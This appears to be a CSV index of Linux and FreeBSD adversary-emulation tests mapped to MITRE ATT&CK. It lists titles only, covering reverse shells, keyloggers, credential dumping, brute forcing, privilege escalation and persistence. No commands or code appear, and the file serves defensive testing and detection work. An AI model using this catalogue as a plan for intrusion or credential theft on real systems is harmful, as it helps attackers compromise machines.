persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,sh
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,sh
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,sh
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,sh
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,bash
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
discovery,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
